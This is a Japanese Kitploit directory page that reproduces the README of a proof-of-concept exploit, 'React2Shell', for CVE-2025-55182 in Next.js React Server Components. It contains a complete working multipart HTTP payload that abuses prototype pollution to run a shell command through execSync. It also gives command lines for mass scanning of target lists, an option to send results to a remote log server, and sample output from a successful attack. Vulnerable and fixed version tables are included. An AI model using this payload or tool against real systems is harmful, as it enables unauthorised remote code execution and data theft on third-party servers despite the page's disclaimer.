Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell は、Next.js における脆弱な React Server Components (RSC) 実装に影響を及ぼす CVE-2025-55182 の proof-of-concept エクスプロイトです。 | Kitploit
ツール/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell は、Next.js における脆弱な React Server Components (RSC) 実装に影響を及ぼす CVE-2025-55182 の proof-of-concept エクスプロイトです。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
127日前未レビュー

💀 React2Shell Exploit — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 React Server Components リモートコード実行

CVE-2025-55182

著者: INDRA


⚠️ 免責事項

このプロジェクトは、教育目的、セキュリティ研究、および許可を得たペネトレーションテストのみを目的として提供されます。

作者は、本ソフトウェアの誤用または損害について一切の責任を負いません。

このエクスプロイトは、自分が所有するシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。


📖 説明

React2Shell は、Next.js の脆弱な React Server Components (RSC) 実装に影響する CVE-2025-55182 の概念実証 (PoC) エクスプロイトです。

このエクスプロイトは、細工されたマルチパートリクエストを送信して、脆弱なデシリアライゼーションフローを悪用し、アプリケーションのリダイレクトダイジェストレスポンスを通じてコマンド出力を抽出します。

成功した場合、エクスプロイトは実行されたコマンドの出力をターミナルに直接表示します。


✨ 特徴

  • 🚀 単一ターゲットモード
  • 🌍 バルクスキャンモード
  • 🔄 HTTP & HTTPS 自動検出
  • ⚡ マルチスレッド実行
  • 📝 オプションのローカルログ記録
  • 🌐 オプションのリモートログサーバー
  • 🎯 クリーンな出力
  • 🛡 SSL 検証無効 (テスト環境向け)
  • 📂 重複ターゲットの除外

📦 要件

Python 3.8+

依存関係をインストール:

root@kitploit:~
pip install requests urllib3

📁 プロジェクト構成

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 脆弱なバージョン

React


Next.js

脆弱

  • 14.3.0-canary.77 以降
  • 15.x
  • 16.x

修正済み

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 使用する HTTP リクエスト

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 使用方法

ヘルプを表示

root@kitploit:~
python exploit.py -h

単一ターゲットをスキャン

root@kitploit:~
python exploit.py -u https://target.com

複数ターゲットをスキャン

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

実行

root@kitploit:~
python exploit.py -f targets.txt

結果を保存

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

リモートログサーバーに結果を送信

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

すべてをまとめて実行

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 コマンドラインオプション


🖥 出力例

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ 仕組み

  1. ターゲットを読み取る
  2. HTTP と HTTPS の URL を自動生成する
  3. 細工されたマルチパートリクエストを送信する
  4. リダイレクトダイジェストを解析する
  5. コマンド出力を抽出する
  6. エクスプロイトの成功を出力する
  7. 必要に応じて結果をローカルまたはリモートに保存する

📌 注意事項

  • スキームが指定されていない場合、HTTP と HTTPS の両方を自動的にテストします。
  • 重複したターゲットは自動的に除外されます。
  • 30 の同時スレッドを使用します。
  • 無効な SSL 証明書を無視します。
  • タイムアウトは 10 秒に設定されています。

❤️ クレジット

  • エクスプロイト開発: INDRA
  • CVE: CVE-2025-55182

⚖️ 法的通知

許可なく本ソフトウェアをシステムに対して使用することは、地域、国、または国際法に違反する可能性があります。

作者は、いかなる誤用についても責任を負いません。


⭐ このプロジェクトがあなたの研究に役立ったなら、スターを付けることを検討してください。

楽しいハンティングを 🕷️

ツールをダウンロード
バージョンステータス
19.0⚠ 脆弱
19.1.0⚠ 脆弱
19.1.1⚠ 脆弱
19.2.0⚠ 脆弱
19.0.1✅ 修正済み
19.1.2✅ 修正済み
19.2.1✅ 修正済み
オプション説明
-uターゲット URL
-fターゲットドメインを含むファイル
-o脆弱なターゲットをローカルに保存
-lリモートログサーバーに結果を送信
-hヘルプを表示